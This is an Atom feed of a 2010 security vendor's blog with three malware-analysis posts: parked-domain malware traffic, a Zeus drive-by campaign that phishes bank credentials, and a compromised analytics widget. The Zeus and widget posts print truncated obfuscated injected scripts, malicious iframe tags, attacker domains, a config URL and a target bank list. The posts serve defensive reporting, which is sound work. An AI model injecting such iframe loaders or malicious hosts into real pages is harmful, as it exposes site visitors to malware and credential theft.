<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2338637496417622488</id><updated>2010-08-30T09:01:12.413-07:00</updated><title type='text'>Dasient Blog</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.dasient.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default?orderby=updated'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default?start-index=26&amp;max-results=25&amp;orderby=updated'/><author><name>Neil Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>26</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-8797132288147159562</id><published>2010-08-17T14:16:00.000-07:00</published><updated>2010-08-17T14:33:00.711-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='widget attack'/><category scheme='http://www.blogger.com/atom/ns#' term='malvertising'/><category scheme='http://www.blogger.com/atom/ns#' term='parked domains'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='Network Solutions'/><title type='text'>Something to 
consider: How much traffic do malware-ridden "parked domains" really get?</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;span style="color: black; "&gt;&lt;span style="color: black; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Over the past few days, there have been widespread reports that parked domains hosted by Network Solutions have been serving up malware, probably for several months. We are definitely glad to see that there is a growing awareness of the threat of web-based malware due to widgets, but one question that seems to be unanswered here is: “what is the true impact of this threat, when compared to say popular widgets or infected web applications?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;”&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span style="color: black; "&gt;&lt;span style="color: black; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 16px; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style="color: black; "&gt;&lt;span style="color: black; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;In our research at Dasient, we have seen that when popular traffic or audience measurement widgets get infected, for instance, thousands of top-ranked sites can be turned into malware distribution vehicles, and infect hundreds of thousands or millions of users. 
This raises the question: how much traffic would 500k ‘parked domains’ really get, and how many users are truly infected?&lt;/span&gt;&lt;/p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;According to Richard Kershaw’s search and affiliate marketing blog, parked domains do not receive much traffic at all. In a &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.qualitynonsense.com/2477/domain-type-in-traffic/" title="http://www.qualitynonsense.com/2477/domain-type-in-traffic/" target="_blank"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span title="http://www.qualitynonsense.com/2477/domain-type-in-traffic/"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;July 2009 study&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, Richard wrote:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;“1,822,377 domains are parked with Sedo, says DomainTools.com as of 8 July 2009… Sedo’s most recent stats show a mere 25 domains get traffic in double digit per day. By the time we hit domain number 26 in their rankings, we’re in single digits... So 0.001% of domains parked with Sedo get double digit per day traffic. 
Or to put it another way, 99.999% of domains parked with Sedo don’t hit double digits daily.”&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="im"&gt;    &lt;/div&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="color: black; "&gt;&lt;span style="color: black; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;The overwhelming majority of parked domains do not get any traffic on a daily basis, which means that only a limited number of Internet users were impacted by the malware being served at Network Solutions.  (Certainly, that may be why the problem was not even noticed for a few months.) In addition, according to &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Brian Krebs &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;in his latest &lt;/span&gt;&lt;/span&gt;&lt;a href="http://krebsonsecurity.com/2010/08/networksolutions-sites-hacked-by-wicked-widget/#more-4532" target="_blank"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;blog post&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; on the matter&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, “One potentially limiting factor in this attack was that it seemed to target Chinese Web surfers,” which would further reduce the impact of this attack on end users.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;To further underscore the issue here, one 
should &lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;contrast this with the information Dasient published regarding &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://blog.dasient.com/2010/06/third-party-javascript-widget.html" title="http://blog.dasient.com/2010/06/third-party-javascript-widget.html" target="_blank"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span title="http://blog.dasient.com/2010/06/third-party-javascript-widget.html"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;a widget attack against a major traffic and audience measurement provider&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; in May, in which some very large Quantcast 100 sites were impacted, in addition to thousands of other legitimate websites that have a significant user base.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Another, more impactful example of web-based malware propagation is &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://news.cnet.com/8301-1009_3-10244529-83.html" title="http://news.cnet.com/8301-1009_3-10244529-83.html" target="_blank"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span title="http://news.cnet.com/8301-1009_3-10244529-83.html"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Gumblar&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, which was a more significant attack as it hijacked many diverse sites (over 80,000 confirmed and distinct sites), and was much more persistent due to its architecture, in which it would compromise diverse web sites via stolen FTP credentials, infect clients to steal more FTP credentials, and, in turn, compromise more diverse web sites.  In fact, even six months after the initial outbreak of Gumblar in May 2009, it continued to infect web servers, and there was no "easy" mitigation (like commenting &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;the widget out of a single parked domain template).  
Also, our research at Dasient concludes that malvertising impacts many more users on a daily basis (&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://wam.dasient.com/wam/about_pressreleases#may182010" title="http://wam.dasient.com/wam/about_pressreleases#may182010" target="_blank"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&lt;span title="http://wam.dasient.com/wam/about_pressreleases#may182010"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;1.3 million page views, by our estimates&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;So while it’s good that malware found in third-party widgets is being identified and discussed in the community, it is important to look at such attacks in perspective and focus the discussions on the threats that actually have a real impact on businesses and users.  
Malware injected onto parked domains is unlikely to have the scale and reach of attacks against legitimate websites, such as the Gumblar attack or attacks against widgets used by legitimate websites.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="im"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:black;"&gt;&lt;span style="color:black;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;At Dasient, we have been publishing information about the threat of web-based malware and its impact on businesses and users since 2009. We look forward to continuing to share the latest information from our research over the coming weeks and months.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=";font-family:Arial;font-size:85%;"&gt;&lt;span style=";font-family:Arial;font-size:11pt;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-8797132288147159562?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/8797132288147159562/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/08/something-to-consider-how-much-traffic.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/8797132288147159562'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/8797132288147159562'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/08/something-to-consider-how-much-traffic.html' 
title='Something to consider: How much traffic do malware-ridden &quot;parked domains&quot; really get?'/><author><name>Ariana</name><uri>http://www.blogger.com/profile/11144728625850193785</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17055172410883886117'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-2693769327222253949</id><published>2010-06-23T16:20:00.000-07:00</published><updated>2010-06-24T13:41:50.230-07:00</updated><title type='text'>More Zeus via drive-by, now improved with targeted phishing against banks</title><content type='html'>By Tufan Demir, Neil Daswani, Rajesh G.&lt;br /&gt;&lt;br /&gt;Date first added to infection library: June 8, 2010&lt;br /&gt;Infection library link: &lt;a href="http://wam.dasient.com/wam/infection_library/cdc7f46229a8abfcad40538bfe08f1bd"&gt;http://wam.dasient.com/wam/infection_library/cdc7f46229a8abfcad40538bfe08f1bd&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Zeus botnet has been spreading via drive-by-download since late last year (e.g. &lt;a href="http://www.scmagazineus.com/zeus-spreading-through-drive-by-download/article/158691/"&gt;http://www.scmagazineus.com/zeus-spreading-through-drive-by-download/article/158691/&lt;/a&gt;), but as they say in the security community -- attacks only get better.  In such previous cases, the goal of the drive-by-download was singular: have the infected client machine join the Zeus botnet and await further instructions.  Dasient's researchers (using data from Dasient's telemetry systems) not only see Zeus malware continue to be distributed via drive-by-download, but such malware also has a second purpose: to distribute targeted phishing kits against the financial sector, including banks such as Citibank and HSBC.  
After joining the Zeus botnet, an infected machine will start keystroke logging to phish user credentials for banking web sites when the user casually visits bank home pages.  In the following, we describe the technical details.&lt;br /&gt;&lt;br /&gt;The combined Zeus/phishing kit malware drive-by-download is distributed via the malicious domain gate4ads.info (although other domains have been used as well).  Infected web pages carry an injected script, shown below, that loads a malicious iframe from gate4ads.info:&lt;br /&gt;&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;&amp;lt;body&gt;&amp;lt;script language='javascript' type='text/javascript'&gt;&lt;br /&gt;var oVoid='oVoid'.substring(42997, 42997);&lt;br /&gt;var yWord;&lt;br /&gt;function jArcG(jArcG){return 'jArcG'};&lt;br /&gt;yWord='%6b%60%68%69...&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;This script appears differently on each infected domain. Here's another example of the script:&lt;br /&gt;&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;&amp;lt;body class="dc-home"&gt;&amp;lt;script language='javascript' type='text/javascript'&gt;&lt;br /&gt;this.wordOn=53159;&lt;br /&gt;var cEnvCont;&lt;br /&gt;var pakCon='pakCon'.substring(3674, 3674);&lt;br /&gt;cEnvCont='%bd%bd%bd%bb...&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Even though the malicious script is polymorphic, its behavior doesn't change. 
It creates the following malicious iframe:&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;&amp;lt;iframe frameborder=0 src='http://gate4ads.info/t/'&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;This iframe in turn creates another iframe:&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;&amp;lt;iframe src='http://itspitsp.com/elleO_o_/index.php?s=[random chars]&amp;[random chars]' width=[random num] height=[random num] frameborder='0'&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;The Malware Behavior&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;The binary that comes down to the user's machine is called updates.exe, and is placed in the temp folder on the user's machine:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/af6288cab4f0b0351ffc01a8a8386d476f423f590be47cc85c54850cc6dbf642-1276130170"&gt;http://www.virustotal.com/analisis/af6288cab4f0b0351ffc01a8a8386d476f423f590be47cc85c54850cc6dbf642-1276130170&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The binary replaces C:\WINDOWS\system32\sdra64.exe with the new file "updates.exe" and creates a registry entry to enable it to start automatically on reboot.  Creating such a registry entry is a common technique that attackers use to make sure their malware always runs even when the user reboots their machine.&lt;br /&gt;&lt;br /&gt;This executable attempts to get the PC to join the Zeus botnet. &lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;task_id=176041d5651e7ef84299f5ddb50a8b1f1&amp;format=html"&gt;http://anubis.iseclab.org/?action=result&amp;task_id=176041d5651e7ef84299f5ddb50a8b1f1&amp;format=html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It gets the configuration file from this url:&lt;br /&gt;itspitsp.com/zeusO_o_/conf13.bin&lt;br /&gt;&lt;br /&gt;This configuration file is in encrypted format. The virus decrypts it with the key hidden in its body. The decrypted configuration file tells the virus which bank sites to monitor. 
When the user visits one of the following urls, the virus will intercept the traffic and present a fake webpage to steal user credentials such as account number, user id and password, transaction numbers etc. The stolen information is logged and delivered to a drop site at a later point in time.&lt;br /&gt;&lt;br /&gt;The list of banks that are being targeted:&lt;br /&gt;&lt;br /&gt;1.     http://internetbanking.gad.de/banking/&lt;br /&gt;2.     http://hsbc.co.uk&lt;br /&gt;3.     http://www.mybank.alliance-leicester.co.uk&lt;br /&gt;4.     http://www.citibank.de&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Source of Attack&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;gate4ads. info is registered in Netherlands.&lt;br /&gt;&lt;br /&gt;Domain ID:D33147654-LRMS&lt;br /&gt;Domain Name:GATE4ADS.INFO&lt;br /&gt;Created On:01-Jun-2010 04:39:28 UTC&lt;br /&gt;Last Updated On:01-Jun-2010 18:45:48 UTC&lt;br /&gt;Expiration Date:01-Jun-2011 04:39:28 UTC&lt;br /&gt;Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com &lt;br /&gt;(R159-LRMS)&lt;br /&gt;Status:CLIENT TRANSFER PROHIBITED&lt;br /&gt;Status:TRANSFER PROHIBITED&lt;br /&gt;Registrant ID:PP-SP-001&lt;br /&gt;Registrant Name:Domain Admin&lt;br /&gt;Registrant Organization:PrivacyProtect.org&lt;br /&gt;Registrant Street1:P.O. 
Box 97&lt;br /&gt;Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org&lt;br /&gt;Registrant Street3:&lt;br /&gt;Registrant City:Moergestel&lt;br /&gt;Registrant State/Province:&lt;br /&gt;Registrant Postal Code:5066 ZH&lt;br /&gt;Registrant Country:NL&lt;br /&gt;Registrant Phone:+45.36946676&lt;br /&gt;Registrant Phone Ext.:&lt;br /&gt;Registrant FAX:&lt;br /&gt;Registrant FAX Ext.:&lt;br /&gt;Registrant Email:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The domain itspitsp.com resolves to a server hosted in China:&lt;br /&gt;&lt;br /&gt;Domain name: itspitsp.com&lt;br /&gt;Status: Active&lt;br /&gt;&lt;br /&gt;Protection Status: public&lt;br /&gt;( make contact info private at http://www.now.cn/domain/domainPrivate.php )&lt;br /&gt;&lt;br /&gt;Registrant: &lt;br /&gt;Name: itspitsp.com&lt;br /&gt;Address: Volodarskiy&lt;br /&gt;City: undefined&lt;br /&gt;Province/state: IZJEVSK&lt;br /&gt;Country: CN&lt;br /&gt;Postal Code: 519000&lt;br /&gt;&lt;br /&gt;Administrative Contact: &lt;br /&gt;Name: itspitsp.com&lt;br /&gt;Organization: itspitsp.com&lt;br /&gt;Address: Volodarskiy&lt;br /&gt;City: undefined&lt;br /&gt;Province/state: IZJEVSK&lt;br /&gt;Country: CN&lt;br /&gt;Postal Code: 519000&lt;br /&gt;Phone: +84.7562425583&lt;br /&gt;Fax: +84.5762425583&lt;br /&gt;Email: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;Summary&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;The gate4ads .info attack is novel in that it propagates a virus with dual purposes: (1) adding end user PCs to the Zeus botnet, and (2) distributing targeted phishing and keystroke logging attacks against the financial sector. Also noteworthy is that the malware infection planted on websites is polymorphic in nature: the JavaScript "attack string" injected onto each compromised legitimate website is different from the others. Thus, a signature-based approach for identifying the malware infection on websites would not succeed. 
Dasient's malware analysis engine, which primarily uses behavior-based technology, identifies such malware infections every time. &lt;br /&gt;&lt;br /&gt;According to Google, the gate4ads .info site was involved in infecting 642 other sites. (&lt;a href="http://google.com/safebrowsing/diagnostic?site=gate4ads.info&amp;hl=en"&gt;http://google.com/safebrowsing/diagnostic?site=gate4ads.info&amp;hl=en&lt;/a&gt;). All of these sites, were they leveraging Dasient's Web Anti-Malware (WAM) monitoring and remediation services, would have been able to identify and contain this malware attack prior to getting blacklisted by Google. More importantly, the sites would have been able to protect their users from being infected with the virus that would add their PC to the Zeus botnet and keystroke log their banking passwords. &lt;br /&gt;&lt;br /&gt;Financial institutions are specifically at risk from the gate4ads .info attack. If this attack were able to penetrate the website of one of the banks being targeted with the keystroke logging, then all of that bank's users would be at risk of having their credentials stolen. Clearly, this would be a major security breach for the bank, and would allow the attackers to compromise large numbers of user accounts. Equally important, if it were discovered that a bank's website was compromised and was serving malware, this would result in major brand and reputation losses for the bank. &lt;br /&gt;&lt;br /&gt;Dasient provides specific services for banks and financial institutions to secure them from web-based malware attacks. 
For more details, visit &lt;a href="http://wam.dasient.com/wam/products_overview"&gt;http://wam.dasient.com/wam/products_overview&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-2693769327222253949?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/2693769327222253949/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2010/06/more-zeus-via-drive-by-now-improved.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/2693769327222253949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/2693769327222253949'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2010/06/more-zeus-via-drive-by-now-improved.html' title='More Zeus via drive-by, now improved with targeted phishing against banks'/><author><name>Tufan Demir</name><uri>http://www.blogger.com/profile/15089335541005713334</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='13582527292670006697'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-5985537869977101432</id><published>2010-06-04T16:20:00.000-07:00</published><updated>2010-06-04T18:04:19.851-07:00</updated><title type='text'>Third-party JavaScript widget discovered to be infected with malware</title><content type='html'>&lt;i&gt;Potentially thousands of legitimate websites that embed the widget are serving malware to their users.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Many websites use third-party JavaScript widgets for counting traffic, tracking users, sharing content, displaying video, enabling polls, and 
providing other user functionality. The use of third-party widgets has enabled rich user functionality and analytics. However, as noted by &lt;a href="http://jeremiahgrossman.blogspot.com/2010/02/web-20-pivot-attacks.html" title="Jeremiah Grossman in his blog post &amp;quot;Web 2.0 pivot attacks&amp;quot;"&gt;Jeremiah Grossman in his blog post "Web 2.0 pivot attacks"&lt;/a&gt;, in a security context, websites that use third-party widgets "essentially allow arbitrary executable code, supplied by a third party, complete access to the web page DOM and the user’s session information." This could, of course, be used to infect the website’s users with malware. &lt;a href="http://www.owasp.org/images/6/6d/OWASP-WASCAppSec2007SanJose_Dangers_of3rdPartyContent.ppt" title="Tom Stripling also discusses"&gt;Tom Stripling also discusses&lt;/a&gt; the dangers of third-party JavaScript widgets, as well as user-contributed content.&lt;br /&gt;&lt;br /&gt;In a research paper published by Google titled “&lt;a href="http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf" title="The Ghost in the Browser"&gt;The Ghost in the Browser&lt;/a&gt;,” researchers claimed that third-party widgets were one of the primary vectors of attack for a website to get infected with malware.&lt;br /&gt;&lt;br /&gt;&lt;div style="margin-left: 40px;"&gt;&lt;i&gt;We identified a free statistics counter that operated fine for almost four years, “when the nature of the counter changed and instead of cataloging the number of visitors, it started to exploit every user visiting pages linked to the counter… In this particular case, the user visited a completely unrelated web site that was hosting a third-party web counter. The web counter was benign for over four years and then drastically changed behavior to exploit any user visiting the site. 
This clearly demonstrates that any delegation of web content should only happen when the third party can be trusted.” &lt;/i&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Just this past weekend, the Dasient security research team identified a third-party JavaScript widget that was responsible for infecting web users at a large Quantcast 100 website. The third-party widget in question was from a reputable market research and analytics firm, and the widget was used for traffic analysis and audience demographics. (Our team has been in contact with the Quantcast 100 website, and is also reaching out to the widget provider in order to help resolve this problem.)&lt;br /&gt;&lt;br /&gt;This third-party JavaScript code was included among a number of other tracking tags present on several thousand URLs of the Quantcast 100 website. The JavaScript code (after being anonymized) is as follows:&lt;br /&gt;&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;// xxxxxx tagging&lt;br /&gt;XXXX.require('//secure-us.xxxxxxxxxxxx.com/xxx.js', function () {&lt;br /&gt;    var trac = nol_t({&lt;br /&gt;        cid: 'xx-xxxxxxx',&lt;br /&gt;        content: '0',&lt;br /&gt;        server: 'secure-us'&lt;br /&gt;    });&lt;br /&gt;    trac.record().post();&lt;br /&gt;});&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;In turn, http://secure-us.xxxxxxxxxxxx.com/xxx.js served the following complicated JavaScript code:&lt;br /&gt;&lt;br /&gt;&lt;pre class="prettyprint"&gt;&lt;br /&gt;function NolTracker(b,a){this.pvar=b;this.mergeFeatures(a)}function nol_t(b,a){return new NolTracker(b,a)}NolTracker.prototype.version="6.0.9";NolTracker.prototype.scriptName=(function(){try{var b=document.getElementsByTagName("script");var c=b[b.length-1].getAttribute("src").match(/[^\/]*$/)}catch(a){}return c||"xxx.js"})...&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;At the end of the complex JavaScript was a malicious iframe sourcing in content from:&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span 
style="color:#ff0000;"&gt;http://94.  75.  210. 6/measure/&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;What is notable about the attack above is that the JavaScript code is so complex, it would be difficult for even a technical person to parse the code quickly and identify the malicious iframe at the end. Furthermore, the attackers have used the pathname "measure" on the malicious domain in an effort to further obfuscate their attack. As a result, a technical person who was investigating the cause of the malware might not pay attention to the iframe; he or she could easily assume that this was part of the legitimate JavaScript code that was measuring user traffic on the website.&lt;br /&gt;&lt;br /&gt;The attackers compromised this third-party analytics provider's JavaScript code and embedded the malicious iframe. A quick search on Google for the JavaScript code returned over 19,000 results for websites that contained this provider's analytics code. Thus, the attackers were able to spread their web-based malware across thousands of legitimate websites (including multiple Quantcast 100 websites) by infecting the third-party analytics provider's JavaScript code with the malicious iframe.&lt;br /&gt;&lt;br /&gt;There is a significant implication for web businesses. The "widgetization" of the web will continue to create opportunities such as the one detailed in this post for attackers to infect legitimate websites with malware. Any third-party code included in a legitimate website can be compromised and exploited to serve malware. In fact, the attackers have an incentive to infect these JavaScript widgets as a way to achieve scale and get "back door access" to popular websites. The concern for web businesses is that, despite all of the security operations and software development practices that they may have in place, there are dependencies on third parties for rendering functionality on web pages on their site. 
And a particular web business has no control over the security practices of the third-party partner, which can get compromised, as was evident from the attack described above.&lt;br /&gt;&lt;br /&gt;It is unrealistic to believe that web businesses will be able to remove all third-party software and JavaScript code from their websites. The "widgetization" of the web will only accelerate, as the trend towards distributed software development, interactivity, and combining best-of-breed software and widgets continues. Despite a web business having significant preventative security measures in place, its website is vulnerable to serving malware due to the use of third-party JavaScript widgets. Therefore, it is critical that web businesses monitor their websites (and thus their third-party JavaScript widget providers) for malware on a regular basis. An attack where a reputable partner gets compromised and infected with malware could happen any time, and it is important that the web business can respond immediately if such an attack occurs. Otherwise, the web business is at risk of serving malware to its users, which would result in users getting infected with malware; significant losses of brand, reputation, and revenue; and potential liability issues. 
